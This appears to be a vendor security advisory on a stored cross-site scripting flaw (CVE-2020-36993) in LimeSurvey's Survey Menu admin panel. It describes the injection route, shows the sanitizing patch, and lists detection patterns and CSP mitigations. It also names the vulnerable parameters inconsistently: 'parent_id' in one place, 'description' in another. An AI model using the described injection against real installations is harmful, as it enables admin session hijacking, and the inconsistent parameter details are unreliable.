CVE-2020-36993 Overview
CVE-2020-36993 is a stored cross-site scripting (XSS) vulnerability affecting LimeSurvey version 4.3.10. The vulnerability exists within the Survey Menu functionality of the administration panel, where attackers can inject malicious SVG scripts through the Surveymenu[title] and Surveymenu[parent_id] parameters. Once injected, the malicious JavaScript persists in the application and executes whenever administrative users access the affected pages, potentially leading to session hijacking, credential theft, or administrative account compromise.
Critical Impact
Authenticated attackers with access to the LimeSurvey administration panel can inject persistent malicious scripts that execute in the context of other administrators, enabling session hijacking and unauthorized administrative actions.
Affected Products
- LimeSurvey 4.3.10
- LimeSurvey versions prior to the security patch commit 3712854a8fd8d875c67640969a1d54c4d93d3676
Discovery Timeline
- 2026-01-28 - CVE-2020-36993 published to NVD
- 2026-01-29 - Last updated in NVD database
Technical Details for CVE-2020-36993
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) stems from insufficient input sanitization in the LimeSurvey administration panel's Survey Menu controller. The application fails to properly sanitize user-supplied input in the Surveymenu[title] and Surveymenu[description] parameters before storing them in the database and subsequently rendering them in administrative views.
The vulnerability requires authentication with access to the administration panel, meaning an attacker must first obtain valid credentials or compromise an existing account. However, once the malicious payload is stored, it will execute in the browser context of any administrator who views the affected Survey Menu content. This creates a privilege escalation pathway where a lower-privileged authenticated user could potentially compromise higher-privileged administrative accounts.
Root Cause
The root cause is improper input validation in the SurveymenuController.php file. When processing POST requests for survey menu creation or updates, the application directly accepts user input without sanitization. The title and description fields are stored as-is in the database and later rendered without proper output encoding, allowing embedded SVG scripts or other JavaScript payloads to execute when the page is rendered.
Attack Vector
The attack requires network access and an authenticated session to the LimeSurvey administration panel. An attacker crafts a malicious POST request containing JavaScript payload in SVG format within the Surveymenu[title] or Surveymenu[description] parameters. When an administrator navigates to the Survey Menu section, the stored payload executes in their browser session, potentially allowing the attacker to steal session tokens, modify survey configurations, create new administrative accounts, or perform other unauthorized actions.
// Security patch in application/controllers/admin/SurveymenuController.php
// Source: https://github.com/LimeSurvey/LimeSurvey/commit/3712854a8fd8d875c67640969a1d54c4d93d3676
$success = false;
if (Yii::app()->request->isPostRequest) {
$aSurveymenu = Yii::app()->request->getPost('Surveymenu', []);
+ // Sanitize title and description to prevent XSS attack
+ if (isset($aSurveymenu['title'])) {
+ $aSurveymenu['title'] = flattenText($aSurveymenu['title'], false, true);
+ }
+ if (isset($aSurveymenu['description'])) {
+ $aSurveymenu['description'] = flattenText($aSurveymenu['description'], false, true);
+ }
if ($aSurveymenu['id'] == '') {
unset($aSurveymenu['id']);
$aSurveymenu['created_at'] = date('Y-m-d H:i:s');
The fix applies the flattenText() function to sanitize user input before processing, stripping potentially malicious HTML and JavaScript content.
Detection Methods for CVE-2020-36993
Indicators of Compromise
- Presence of SVG tags or JavaScript code in survey menu titles or descriptions in the database
- Unexpected <script>, <svg>, or onload attributes in LimeSurvey database fields
- Unusual administrative session activity or session tokens being sent to external domains
- Web server logs showing POST requests to Survey Menu endpoints with encoded script payloads
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect XSS payload patterns in POST parameters targeting /admin/surveymenu endpoints
- Review database contents for survey menu entries containing HTML tags, SVG elements, or JavaScript event handlers
- Monitor Content Security Policy (CSP) violation reports for inline script execution attempts
- Deploy SentinelOne Singularity XDR to detect anomalous browser behavior and exfiltration attempts from administrative sessions
Monitoring Recommendations
- Enable detailed logging for the LimeSurvey administration panel and monitor for suspicious Survey Menu modifications
- Configure browser-based monitoring to detect script injection attempts and unexpected DOM modifications
- Set up alerts for outbound network connections from administrative workstations to unknown domains following LimeSurvey access
- Regularly audit survey menu entries for unexpected or encoded content
How to Mitigate CVE-2020-36993
Immediate Actions Required
- Update LimeSurvey to a version that includes the security patch (commit 3712854a8fd8d875c67640969a1d54c4d93d3676 or later)
- Review and sanitize existing survey menu entries in the database for malicious content
- Implement strict Content Security Policy (CSP) headers to mitigate XSS impact
- Restrict administrative panel access to trusted networks and require multi-factor authentication
Patch Information
LimeSurvey has released a security patch addressing this vulnerability. The fix is available in commit 3712854a8fd8d875c67640969a1d54c4d93d3676. The patch adds input sanitization using the flattenText() function for both the title and description fields in the Survey Menu controller, as well as the full_name field in the User Management controller. Organizations should update to the latest LimeSurvey version that incorporates this fix.
For additional technical details, refer to the VulnCheck Advisory for LimeSurvey and Exploit-DB #48762.
Workarounds
- If immediate patching is not possible, restrict access to the LimeSurvey administration panel to a limited set of trusted users
- Implement a Web Application Firewall (WAF) with XSS detection rules to filter malicious payloads
- Add Content Security Policy headers to prevent inline script execution: Content-Security-Policy: script-src 'self';
- Manually sanitize database entries by removing any HTML or script content from survey menu title and description fields
# Configuration example - Add CSP headers in Apache
# Add to .htaccess or Apache configuration for LimeSurvey
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self';"
Header set X-Content-Type-Options "nosniff"
Header set X-XSS-Protection "1; mode=block"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
